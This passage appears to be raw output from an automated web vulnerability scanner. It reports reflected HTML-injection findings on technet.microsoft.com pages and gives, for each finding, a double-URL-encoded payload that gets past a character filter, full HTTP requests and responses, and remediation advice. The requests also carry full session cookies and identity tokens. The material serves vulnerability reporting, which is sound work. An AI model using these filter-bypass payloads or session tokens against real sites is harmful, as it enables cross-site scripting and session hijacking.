Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10210
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:22:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb742437.aspxb0703"><a>705b67e6431" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1b59%2522%253e%253ca%253e118c6a3eaa5 was submitted in the REST URL parameter 1. This input was echoed as c1b59"><a>118c6a3eaa5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usc1b59%2522%253e%253ca%253e118c6a3eaa5/library/bb742438.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:20:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usc1b59"><a>118c6a3eaa5/library/bb742438" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcafe%2522%253e%253ca%253eab5a2bf9ae was submitted in the REST URL parameter 2. This input was echoed as fcafe"><a>ab5a2bf9ae in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryfcafe%2522%253e%253ca%253eab5a2bf9ae/bb742438.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10198
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:21:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryfcafe"><a>ab5a2bf9ae/bb742438" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8911%2522%253e%253ca%253e53e00b5b92a was submitted in the REST URL parameter 3. This input was echoed as e8911"><a>53e00b5b92a in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb742438.aspxe8911%2522%253e%253ca%253e53e00b5b92a HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:22:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb742438.aspxe8911"><a>53e00b5b92a" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6b33%2522%253e%253ca%253e454334ed0dc was submitted in the REST URL parameter 1. This input was echoed as d6b33"><a>454334ed0dc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usd6b33%2522%253e%253ca%253e454334ed0dc/library/bb742457.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:19:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd6b33"><a>454334ed0dc/library/bb742457" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cccec%2522%253e%253ca%253e0ccff13a724 was submitted in the REST URL parameter 2. This input was echoed as cccec"><a>0ccff13a724 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/librarycccec%2522%253e%253ca%253e0ccff13a724/bb742457.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:19:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarycccec"><a>0ccff13a724/bb742457" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bce8%2522%253e%253ca%253e7b6302c4f0 was submitted in the REST URL parameter 3. This input was echoed as 7bce8"><a>7b6302c4f0 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb742457.aspx7bce8%2522%253e%253ca%253e7b6302c4f0 HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10208
